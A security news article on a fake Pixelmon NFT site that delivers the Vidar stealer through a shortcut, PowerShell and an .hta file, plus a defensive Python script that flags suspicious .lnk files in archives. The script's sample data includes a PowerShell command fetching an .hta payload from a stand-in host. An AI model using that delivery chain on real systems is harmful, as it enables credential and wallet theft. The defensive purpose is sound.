Scam Pixelmon NFT Website Hosts Password-stealing Malware

Vlad CONSTANTINESCU

A fraudulent website mimicking the popular Pixelmon NFT project lures visitors with promises of free collectibles and tokens, only to have them download and install password-stealing malware.

Pixelmon is an NFT project that has garnered a significant fanbase, counting almost 200,000 followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.

In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.

However, instead of providing visitors with links to a demo version of the game, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. To be compromised, users would need to download a malicious archive that packs a Windows shortcut.

Upon opening the Windows shortcut (setup.lnk), the potential victims trigger the execution of a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file retrieves a password-stealing malware called Vidar, spotted in similar attacks in the past.

Running Vidar establishes a connection to a Telegram channel, retrieves the IP address of a command-and-control (C2) server, then downloads additional configuration files and modules to steal data from compromised systems. Vidar can search for relevant files on infected devices, exfiltrate them to the address defined by the threat actor, and steal passwords from apps and browsers.
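As an added illustration, not code from the article or from Bitdefender, the following defender-side triage script covers the delivery stage described above: it opens a downloaded zip archive, pulls out every Windows shortcut, and flags any whose embedded strings point at PowerShell, mshta or a remote .hta, as the fake setup.lnk does. The zip container, the entry names, the indicator list and the sample archive are all assumptions constructed here for the demonstration.

```python
import io
import zipfile

# Lowercase substrings matching the chain described above (shortcut ->
# PowerShell -> remote .hta). Constructed triage list, not a full signature.
INDICATORS = ("powershell", "mshta", ".hta", "http")

# Every Shell Link (.lnk) starts with HeaderSize 0x4C and the Shell Link CLSID.
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")


def lnk_indicators(data: bytes) -> list[str]:
    """Return the indicators present in a raw .lnk blob. Shortcut string data
    (target, arguments) is stored UTF-16LE, while some link-info paths are
    ANSI, so both a UTF-16LE and a plain byte view are searched."""
    text = data.decode("latin-1").lower()
    text += " " + data.decode("utf-16-le", errors="ignore").lower()
    return [ind for ind in INDICATORS if ind in text]


def triage_archive(blob: bytes) -> dict[str, list[str]]:
    """Map each .lnk entry of a zip archive to the indicators found inside it.
    An entry named .lnk that lacks the Shell Link header is marked as well."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            data = zf.read(info)
            hits = lnk_indicators(data)
            if not data.startswith(LNK_MAGIC):
                hits.append("bad-header")
            findings[info.filename] = hits
    return findings


def is_suspicious(findings: dict[str, list[str]]) -> bool:
    """A game demo has no need for a shortcut that launches a script host."""
    return any(hits for hits in findings.values())


def build_sample_archive() -> bytes:
    """Constructed stand-in for the download: a 76-byte Shell Link header
    followed by UTF-16LE string data, one decoy shortcut per outcome."""
    header = LNK_MAGIC + b"\x00" * (76 - len(LNK_MAGIC))
    args = 'powershell -Command "Invoke-WebRequest https://example.invalid/System32.hta"'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("setup.lnk", header + args.encode("utf-16-le"))
        zf.writestr("readme.lnk", header + r"C:\Games\Readme.txt".encode("utf-16-le"))
    return buf.getvalue()
```

Run `triage_archive(build_sample_archive())` to see the decoy setup.lnk flagged and the benign readme.lnk reported clean; a real scanner would parse the shortcut's argument block properly rather than string-search the whole file.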

This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. As Pixelmon is an NFT site, threat actors expect its visitors to have cryptocurrency wallets installed on their systems.

To steer clear of this type of attack, users should always check the website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.
